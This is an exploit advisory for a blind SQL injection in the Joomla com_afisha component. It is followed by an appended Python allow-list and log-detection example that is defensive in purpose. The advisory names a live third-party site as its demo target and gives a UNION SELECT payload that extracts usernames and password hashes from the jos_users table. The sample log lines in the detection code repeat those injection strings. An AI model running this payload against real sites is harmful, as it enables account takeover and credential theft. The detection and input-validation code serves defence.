The Joomla Afisha component suffers from a remote blind SQL injection vulnerability.
759cbe359f764fc801a99e81768693914180ef7b8da9894773a3da5b24698545
<------------------- header data start ------------------- >
#####################################################################
#Joomla Component com_afisha Blind SQL injection Vulnerability
#####################################################################
# author : FL0RiX
# Name : com_afisha
# Bug Type : (Blind) SQL Injection
# Infection : Admin login credentials can be obtained.
# Demo Vuln. :
TRUE(+)
» http://www.krasrab.net/index.php?option=com_afisha&task=viewcat&Itemidcat=4 and 1=1
FALSE(-)
» http://www.krasrab.net/index.php?option=com_afisha&task=viewcat&Itemidcat=4 and 1=0
# Bug Fix Advice : Malicious characters should be filtered.
#############################################################
< ------------------- header data end ------------------- >
< -- bug code start -- >
path/index.php?option=com_afisha&task=viewcat&Itemidcat=4/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user()/**/from/**/jos_users
< -- bug code end -- >
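
Added example (not part of the original advisory, and not the component's own code): the fix advice above, applied as an allow-list check that accepts Itemidcat only when it is a plain decimal integer, and reused as a detection rule over web access logs. The function names, the sample log lines and the Apache common log format are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_afisha&task=viewcat&Itemidcat=4 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_afisha&task=viewcat&Itemidcat=4 and 1=1 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:06 +0000] "GET /index.php?option=com_afisha&task=viewcat&Itemidcat=4%20and%201=0 HTTP/1.1" 200 812',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_afisha&task=viewcat&Itemidcat=4/**/and/**/1=0 HTTP/1.1" 200 812',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9000',
]

# The request target may contain raw spaces, so match greedily up to " HTTP/x.y".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+) HTTP/\d(?:\.\d)?"')
# ASCII digits only; \d would also accept non-ASCII digit characters.
INT_RE = re.compile(r"[0-9]{1,10}")


def parse_itemidcat(raw):
    """Allow-list check: return the id as int, or None if raw is not a plain integer."""
    return int(raw) if INT_RE.fullmatch(raw) else None


def suspicious_afisha_requests(lines):
    """Return (client_ip, decoded_value) for com_afisha requests whose
    Itemidcat parameter fails the allow-list check."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        _, _, query = match.group("target").partition("?")
        # parse_qs percent-decodes values, so encoded and raw forms compare equal.
        params = parse_qs(query, keep_blank_values=True)
        if "com_afisha" not in params.get("option", []):
            continue
        for value in params.get("Itemidcat", []):
            if parse_itemidcat(value) is None:
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_afisha_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric Itemidcat: {value!r}")
```

In the component itself, the same rule means reading Itemidcat as an integer before it reaches the query, rather than trying to strip individual characters.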